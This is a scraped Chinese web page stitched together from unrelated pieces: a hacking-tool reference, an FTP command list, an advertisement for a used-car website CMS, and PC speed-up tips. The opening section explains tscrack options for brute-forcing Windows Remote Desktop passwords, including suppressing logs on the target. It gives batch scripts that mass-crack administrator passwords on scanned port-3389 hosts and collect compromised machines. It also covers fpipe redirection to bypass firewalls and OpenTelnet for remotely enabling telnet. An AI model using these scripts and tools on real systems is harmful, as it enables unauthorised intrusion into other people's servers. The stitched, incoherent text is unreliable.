嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出   终端服务密码破解: tscrack.exe   参数说明   -h 显示使用帮助   -v 显示版本信息   -s 在屏幕上打出解密能力   -b 密码错误时发出的声音   -t 同是发出多个连接(多线程)   -N Prevent System Log entries on targeted server   -U 卸载移除tscrack组件   -f 使用-f后面的密码   -F 间隔时间(频率)   -l 使用-l后面的用户名   -w 使用-w后面的密码字典   -p 使用-p后面的密码   -D 登录主页面   用法示例   tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的administrator的登陆密码   tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆192.168.0.1的administrator用户   @if not exist ipcscan.txt goto noscan   @for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i   Nscan   @echo 3389.txt no find or scan faild   (①存为3389.bat) (假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt)   3389.bat意思是:从3389.txt文件中取一个IP,接着运行hack.bat   @if not exist tscrack.exe goto noscan   @tscrack %1 -l administrator -w pass.dic >>rouji.txt   :noscan   @echo tscrack.exe no find or scan faild   (②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下;就可以等待结果了)   hack.bat意思是:运行tscrack.exe用字典暴破3389.txt中所有主机的administrator密码,并将破解结果保存在rouji.txt文件中。   其它   Shutdown.exe   Shutdown IP地址 t:20 20秒后将对方NT自动关闭(Windows 2003系统自带工具,在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。)   fpipe.exe (TCP端口重定向工具) 在第二篇中有详细说明(端口重定向绕过防火墙)   fpipe -l 80 -s 1029 -r 80 当有人扫锚你的80端口时,他扫到的结果会完全是的主机信息   Fpipe -l 23 -s 88 -r 23 目标IP 把本机向目标IP发送的23端口Telnet请求经端口重定向后,就通过88端口发送到目标IP的23端口。(与目标IP建立Telnet时本机就用的88端口与其相连接)然后:直接Telnet 127.0.0.1(本机IP)就连接到目标IP的23端口了。   OpenTelnet.exe (远程开启telnet工具)   opentelnet.exe IP 帐号 密码 ntlm认证方式 Telnet端口 (不需要上传ntlm.exe破坏微软的身份验证方式)直接远程开启对方的telnet服务后,就可用telnet ip 连接上对方。   NTLM认证方式:0:不使用NTLM身份验证;1:先尝试NTLM身份验证,如果失败,再使用用户名和密码;2:只使用NTLM身份验证。   ResumeTelnet.exe (OpenTelnet附带的另一个工具)   resumetelnet.exe IP 帐号 密码 用Telnet连接完对方后,就用这个命令将对方的Telnet设置还原,并同时关闭Telnet服务。   FTP命令详解   FTP命令是Internet用户使用最频繁的命令之一,熟悉并灵活应用FTP的内部命令,可以大大方便使用者,并收到事半功倍之效。如果你想学习使用进行后台FTP下载,那么就必须学习FTP指令。   FTP的命令行格式为:   ftp -v -d -i -n -g [主机名] ,其中   -v 显示远程服务器的所有响应信息   -n 限制ftp的自动登录,即不使用;.n etrc文件;   -d 使用调试方式;   -g 取消全局文件名。   FTP使用的内部命令如下(中括号表示可选项):   1.![cmd[args]]:在本地机中执行交互shell,exit回到ftp环境,如:!ls*.zip   2.$ macro-ame[args]:执行宏定义macro-name。   3.account[password]:提供登录远程系统成功后访问系统资源所需的补充口令。    4.append local-file[remote-file]:将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。   5.ascii:使用ascii类型传输方式。   6.bell:每个命令执行完毕后计算机响铃一次。   7.bin:使用二进制文件传输方式。   8.bye:退出ftp会话过程。   9.case:在使用mget时,将远程主机文件名中的大写转为小写字母。   10. cd remote-dir:进入远程主机目录。   11.cdup:进入远程主机目录的父目录。   12.chmod mode file-name:将远程主机文件file-name的存取方式设置为mode,如:chmod 777 a.out。   13.close:中断与远程服务器的ftp会话(与open对应)。   14 .cr:使用asscii方式传输文件时,将回车换行转换为回行。   15.delete remote-file:删除远程主机文件。   16.debug[debug-value]:设置调试方式, 显示发送至远程主机的每条命令,如:deb up 3,若设为0,表示取消debug。   17.dir[remote-dir][local-file]:显示远程主机目录,并将结果存入本地文件。    18.disconnection:同close。   19.form format:将文件传输方式设置为format,缺省为file方式。   20.get remote-file[local-file]:将远程主机的文件remote-file传至本地硬盘的local-file。   21.glob:设置mdelete,mget,mput的文件名扩展,缺省时不扩展文件名,同命令行的-g参数。   22.hash:每传输1024字节,显示一个hash符号(#)。   23.help[cmd]:显示ftp内部命令cmd的帮助信息,如:help get。    24.idle[seconds]:将远程服务器的休眠计时器设为[seconds]秒。 25.image:设置二进制传输方式(同binary)。 26.lcd[dir]:将本地工作目录切换至dir。 27. ls[remote-dir][local-file]:显示远程目录remote-dir, 并存入本地文件local-file。 28.macdef macro-name:定义一个宏,遇到macdef下的空行时,宏定义结束。 29.mdelete[remote-file]:删除远程主机文件。 30.mdir remote-files local-file:与dir类似,但可指定多个远程文件,如 :mdir *.o.*.zipoutfile。 31.mget remote-files:传输多个远程文件。 32.mkdir dir-name:在远程主机中建一目录。 33.mls remote-file local-file:同nlist,但可指定多个文件名。 34.mode[modename]:将文件传输方式设置为modename, 缺省为stream方式。    modtime file-name:显示远程主机文件的最后修改时间。 mput local-file:将多个文件传输至远程主机。 newer file-name:如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近,则重传该文件。   38.nlist[remote-dir][local-file]:显示远程主机目录的文件清单,并存入本地硬盘的local-file。   39.nmap[inpattern outpattern]:设置文件名映射机制, 使得文件传输时,文件中的某些字符相互转换, 如:nmap $1.$2.$3[$1,$2].[$2,$3],则传输文件a1.a2.a3时,文件名变为a1,a2。该命令特别适用于远程主机为非UNIX机的情况。   40.ntrans[inchars[outchars]]:设置文件名字符的翻译机制,如ntrans1R,则文件名LLL将变为RRR。   41.open host[port]:建立指定ftp服务器连接,可指定连接端口。   42.passive:进入被动传输方式。   43.prompt:设置多个文件传输时的交互提示。   44.proxy ftp-cmd:在次要控制连接中,执行一条ftp命令, 该命令允许连接两个ftp服务器,以在两个服务器间传输文件。第一条ftp命令必须为open,以首先建立两个服务器间的连接。   45.put local-file[remote-file]:将本地文件local-file传送至远程主机。   46.pwd:显示远程主机的当前工作目录。   47.quit:同bye,退出ftp会话。   48.quote arg1,arg2...:将参数逐字发至远程ftp服务器,如:quote syst.   49.recv remote-file[local-file]:同get。   50.reget remote-file[local-file]:类似于get, 但若local-file存在,则从上次传输中断处续传。   51.rhelp[cmd-name]:请求获得远程主机的帮助。   52.rstatus[file-name]:若未指定文件名,则显示远程主机的状态, 否则显示文件状态。   53.rename[from][to]:更改远程主机文件名。   54.reset:清除回答队列。   55.restart marker:从指定的标志marker处,重新开始get或put,如:restart 130。   56.rmdir dir-name:删除远程主机目录。   57.runique:设置文件名只一性存储,若文件存在,则在原文件后加后缀.1, .2等。   58.send local-file[remote-file]:同put。   59.sendport:设置PORT命令的使用。   60.site arg1,arg2...:将参数作为SITE命令逐字发送至远程ftp主机。   61.size file-name:显示远程主机文件大小,如:site idle 7200。   62.status:显示当前ftp状态。   63.struct[struct-name]:将文件传输结构设置为struct-name, 缺省时使用stream结构。   64.sunique:将远程主机文件名存储设置为只一(与runique对应)。   65.system:显示远程主机的操作系统类型。   66.tenex:将文件传输类型设置为TENEX机的所需的类型。   67.tick:设置传输时的字节计数器。   68.trace:设置包跟踪。   69.type[type-name]:设置文件传输类型为type-name,缺省为ascii,如:type binary,设置二进制传输方式。   70.umask[newmask]:将远程服务器的缺省umask设置为newmask,如:umask 3   71.user user-name[password][account]:向远程主机表明自己的身份,需要口令时,必须输入口令,如:user anonymous my@email。   72.verbose:同命令行的-v参数,即设置详尽报告方式,ftp 服务器的所有响 应都将显示给用户,缺省为on.   73.?[cmd]:同help.
授权方式: 共享软件 界面语言: 简体中文 文件大小: 34.0 MB 更新时间: 2020-07-28 资源类型: 国产软件 推荐等级: ★★★☆☆ 平台环境: Win2003,WinXP,Win2000,Win9X 作者主页: 点击查看 演示地址: 点击查看 详细介绍 – [ 千博二手车网站系统 v2020 Build0728 ] 千博二手车网站系统 无使用时间限制、无域名限制,支持电脑版、手机版、绑定到微信、微信小程序,HTML5响应式内核,高效且优秀。 为什么选择千博二手车网站系统? 一、0费用,完全免费无限制。 免费下载、免费使用、内置一套精美二手车网站模板,模板界面、网站数据都可以自主管理和维护。本版本将于近期开源,提供全部开发源码,您可以登录官网关注千博公众号,第一时间获取最新开源动态、下载源码。 二、稳健、高负载 千博二手车网站系统是基于微软 .Net4.0企业平台 + Microsoft SQL Server 2008/2012/2014/2016(SQL存储过程) 进行开发的新型网站管理系统。.Net4.0平台的稳定性、安全性以及各种特殊性能一直被业界所公认,被视为微软在企业开发领域的骄傲,也是千博二手车网站系统保持持久稳定的核心条件。 不仅如此,千博二手车网站系统的 N 层架构设计,为系统提供了充分的可伸缩的特性,使千博二手车网站系统扩展性能够适应各种信息化网站平台的规模和应用需求。 千博二手车网站系统出色的数据处理能力,体现在它对业界公认的海量数据库类型 Microsoft SQL Server 的支持上。系统优秀的数据处理和管理能力为二手车网站用户不同发展阶段提供了完美、领先的数据存储方案。 三、简单、好用,新手也能轻松上手。 千博二手车网站系统,真正从用户的使用习惯出发,操作简单方便,可视化编辑所见即所得,只要会打字就可以轻松管理和维护网站所有内容。 三、响应式布局,流畅专业的二手车网站前端界面设计,获得优越的用户体验! 什么是响应式布局? Responsive design,意在实现不同屏幕分辨率的终端上浏览网页的不同展示方式。通过响应式设计能使网站在手机和平板电脑上有更好的浏览阅读体验。 千博二手车网站系统的界面设计遵循最新的 W3C 国际网页设计标准,网站无论运行在 IE、Opera、Netscape 甚至挑剔的 Firefox 浏览器上,都能流畅、完整、真实地展示出您的网站。千博二手车网站系统遵循多浏览器、高速度的 W3C 标准核心思想,以尽量避免在各个浏览器中的差异性,不会因为浏览器的不同而系统功能受到限制。千博二手车网站系统流畅的设计不仅提升用户体验,而且以视觉的美感提高网站亲和力。 出色的模板设计,特别是千博原创设计团队制作的网站模板必须具备以下特点: 1、前端代码清爽规范标准,方便以后维护; 2、前端模板代码编写细致并经过严谨的测试,兼容各大浏览器:针对时下流行浏览器进行优化,IE、Chrome、Safari、FireFox、360,Opera一个也不落下。 3、响应式布局,自适应电脑、手机、平板等访问终端; 4、前端模板界面都可以自定义修改或根据需要全新制作自己的网站前台美工样式,点点鼠标就能完成修改,并不需要学习特定的程序语言代码基础; 6、支持图片上传自动水印功能,可以方便地设置每页信息条数、时间格式、展示方式、排序方式、标题字数等属性。 7、栏目分类支持无限级别,图文排版支持可视化,文章内容分页、视频播放、文件下载等功能,所有操作所见即所得,让新手也能轻松上手; 8、内容管理支持批量审核、批量设置、批量移动、批量删除、推荐、置顶等操作,设置回收站功能,用户误删除的数据可以轻松找回; 8、支持全站检索,用户输入一个词,搜新闻、搜产品、搜一切数据,就是这么方便; 9、全站文字、系统栏目、信息内容和全站图片、CSS样式表、JS文件支持用户自定义; 10、内置统计模块,用户也可以接入第三方统计接口,轻松监控网站浏览及来访者详情; 11、支持电脑版、手机版、绑定到微信、微信小程序:是指在保持同一域名、同一后台、同一数据库、同一套系统的基础上,不同设备(PC/手机/PAD)来访问网站前台时,网站都会针对此类设备显示与之最相适应和专为此类设备的用户使用习惯优化的前台界面,从而在不同设备访问时都能提供最佳用户体验。 四、功能更强大、扩展更方便! 千博二手车网站系统提供了灵活、强大的自定义模型功能,借助此功能您可以根据自身需求搭建成内容丰富、类型各样的网站平台。 比如,您需要为网站增加一个在线视频点播的功能?首先设计视频栏目所需要的项目(即字段,如视频名称、视频存放地址、视频图片、视频介绍等),接下来只需要使用千博二手车网站系统的自定义模型功能,逐步添加所需的各种表单,如:文本框类字段、在线上
电脑变慢de完全解决方案   一、软件篇   1、设定虚拟内存   硬盘中有一个很宠大的数据交换文件,它是系统预留给虚拟内存作暂存的地方,很多应用程序都经常会使用到,所以系统需要经常对主存储器作大量的数据存取,因此存取这个档案的速度便构成影响计算机快慢的非常重要因素!一般Windows预设的是由系统自行管理虚拟内存,它会因应不同程序所需而自动调校交换档的大小,但这样的变大缩小会给系统带来额外的负担,令系统运作变慢!有见及此,用户最好自定虚拟内存的最小值和最大值,避免经常变换大小。要设定虚拟内存,在“我的电脑”上按右键选择“属性”,在“高级”选项里的“效能”的对话框中,对“虚拟内存”进行设置。   3、检查应用软件或者驱动程序   有些程序在电脑系统启动会时使系统变慢。如果要是否是这方面的原因,我们可以从“安全模式”启动。因为这是原始启动,“安全模式”运行的要比正常运行时要慢。但是,如果你用“安全模式”启动发现电脑启动速度比正常启动时速度要快,那可能某个程序是导致系统启动速度变慢的原因。   4、桌面图标太多会惹祸   桌面上有太多图标也会降低系统启动速度。Windows每次启动并显示桌面时,都需要逐个查找桌面快捷方式的图标并加载它们,图标越多,所花费的时间当然就越多。同时有些杀毒软件提供了系统启动扫描功能,这将会耗费非常多的时间,其实如果你已经打开了杀毒软件的实时监视功能,那么启动时扫描系统就显得有些多余,还是将这项功能禁止吧!建议大家将不常用的桌面图标放到一个专门的文件夹中或者干脆删除!   5、ADSL导致的系统启动变慢   默认情况下WindowsXP在启动时会对网卡等网络设备进行自检,如果发现网卡的IP地址等未配置好就会对其进行设置,这可能是导致系统启动变慢的真正原因。这时我们可以打开“本地连接”属性菜单,双击“常规”项中的“Internet协议”打开“TCP/IP属性”菜单。将网卡的IP地址配置为一个在公网(默认的网关是192.168.1.1)中尚未使用的数值如192.168.1.X,X取介于2~255之间的值,子网掩码设置为255.255.255.0,默认网关和DNS可取默认设置。   6、字体对速度的影响   虽然微软声称Windows操作系统可以安装1000~1500种字体,但实际上当你安装的字体超过500种时,就会出现问题,比如:字体从应用程序的字体列表中消失以及Windows的启动速度大幅下降。在此建议最好将用不到或者不常用的字体删除,为避免删除后发生意外,可先进行必要的备份。   7、删除随机启动程序   何谓随机启动程序呢?随机启动程序就是在开机时加载的程序。随机启动程序不但拖慢开机时的速度,而且更快地消耗计算机资源以及内存,一般来说,如果想删除随机启动程序,可去“启动”清单中删除,但如果想详细些,例如是QQ、popkiller之类的软件,是不能在“启动”清单中删除的,要去“附属应用程序”,然后去“系统工具”,再去“系统信息”,进去后,按上方工具列的“工具”,再按“系统组态编辑程序”,进去后,在“启动”的对话框中,就会详细列出在启动电脑时加载的随机启动程序了!XP系统你也可以在“运行”是输入Msconfig调用“系统配置实用程序”才终止系统随机启动程序,2000系统需要从XP中复制msconfig程序。   8、取消背景和关闭activedesktop   不知大家有否留意到,我们平时一直摆放在桌面上漂亮的背景,其实是很浪费计算机资源的!不但如此,而且还拖慢计算机在执行应用程序时的速度!本想美化桌面,但又拖慢计算机的速度,这样我们就需要不在使用背景了,方法是:在桌面上按鼠标右键,再按内容,然后在“背景”的对话框中,选“无”,在“外观”的对话框中,在桌面预设的青绿色,改为黑色......至于关闭activedesktop,即是叫你关闭从桌面上的web画面,例如在桌面上按鼠标右键,再按内容,然后在“背景”的对话框中,有一幅背景,名为WindowsXX,那副就是web画面了!所以如何系统配置不高就不要开启。   10、把Windows变得更苗条   与DOS系统相比,Windows过于庞大,而且随着你每天的操作,安装新软件、加载运行库、添加新游戏等等使得它变得更加庞大,而更为重要的是变大的不仅仅是它的目录,还有它的注册表和运行库。因为即使删除了某个程序,可是它使用的DLL文件仍然会存在,因而随着使用日久,Windows的启动和退出时需要加载的DLL动态链接库文件越来越大,自然系统运行速度也就越来越慢了。这时我们就需要使用一些彻底删除DLL的程序,它们可以使Windows恢复苗条的身材。建议极品玩家们最好每隔两个月就重新安装一遍Windows,这很有效。   11、更改系统开

6,845

社区成员

发帖
与我相关
我的任务
社区描述
Windows 2016/2012/2008/2003/2000/NT
社区管理员
  • Windows Server社区
  • qishine
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧